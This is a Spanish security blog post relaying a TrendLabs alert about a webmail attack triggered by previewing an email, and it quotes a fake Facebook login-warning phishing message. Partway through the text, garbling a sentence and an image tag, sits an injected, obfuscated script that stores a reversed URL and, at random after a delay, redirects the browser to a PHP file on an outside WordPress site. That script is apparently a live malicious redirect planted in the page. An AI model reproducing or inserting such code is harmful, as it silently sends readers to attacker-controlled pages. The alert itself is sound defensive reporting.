Alerta sobre nuevo método de ataque por solo ver el mensaje enviado
Recientemente, uno de los miembros del equipo de TrendLabs en Taiwán recibió lo que parecía ser un ataque dirigido a través de webmail. A diferencia de otros ataques basados en el correo electrónico que requieren que los usuarios abran el email, hagan click en el link que incorpora el mensaje o descarguen y ejecuten un archivo adjunto, este ataque se limita a ofrecer al usuario una vista previa del mensaje en su navegador para poder lanzar el ataque.
La siguiente imagen es una captura de pantalla de la página de bandeja de entrada del email:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Webmail_1305539102376.JPG” alt=”” width=”199″ height=”184″ /></p>
<p>A continuación se traduce el tex<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to que contiene el cuerpo del mensaje anterior:
“Asunto: ¿Alguna vez has iniciado sesión en Facebook desde lugar desconocido?
Contenido:
Estimado Usuario de Facebook,
Su cuenta de Facebook ha registrado un intento de acceso desde un ordenador o dispositivo o desde un lugar que nunca ha utilizado con anterioridad. Para la protección de la seguridad de su cuenta, antes de que confirme que su cuenta no ha sido hackeada, hemos procedido a su bloqueo temporal.
¿Alguna vez ha iniciado sesión en Facebook desde otro lugar?
Si éste no es su nombre, por favor use su ordenador personal para acceder a Facebook y siga las instrucciones para administrar la información de cuenta.
Si ésta no es su cuenta, por favor, no se preocupe. Proceda a reiniciar la sesión y podrá volver a su propia cuenta.
Para obtener más información, visite nuestro Centro de Asistencia en: … (link)
Gracias,
El equipo de seguridad de Facebook”
Tal y como se apuntaba anteriormente, la vista previa de los mensajes permite la descarga de un script de una URL remota. El script descargado después se inyecta en la página para iniciar el robo de información. La información robada incluye datos sensibles tales como mensajes de email e información de contactos. Junto a esto, y más importante aún es que el script también establece el reenvío de correos electrónicos enviando todos los mensajes de los usuarios a una dirección específica.
El email parece estar especialmente diseñado por un destinatario concreto, en el que su ID de Hotmail es utilizado específicamente en el script malicioso integrado en el correo. Además, la descarga posterior se basa en el ID de Hotmail y un número especificado por el atacante. Cambiar el número puede cambiar la carga útil.
Si un empleado comprueba su correo web personal en el trabajo y es víctima del ataque, el atacante puede acceder a información sensible que podría estar relacionada con la compañía en la que esa persona está trabajando, incluyendo los contactos y los mensajes de correo electrónico. Las empresas deben tomar en serio el riesgo que entrañan éste y otros ataques similares, sobre todo teniendo en cuenta que basta con una vista previa del email para activar y lanzar el ataque.
Mas informacion de este engendro se puede ver en JS_AGENT.SMJ
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.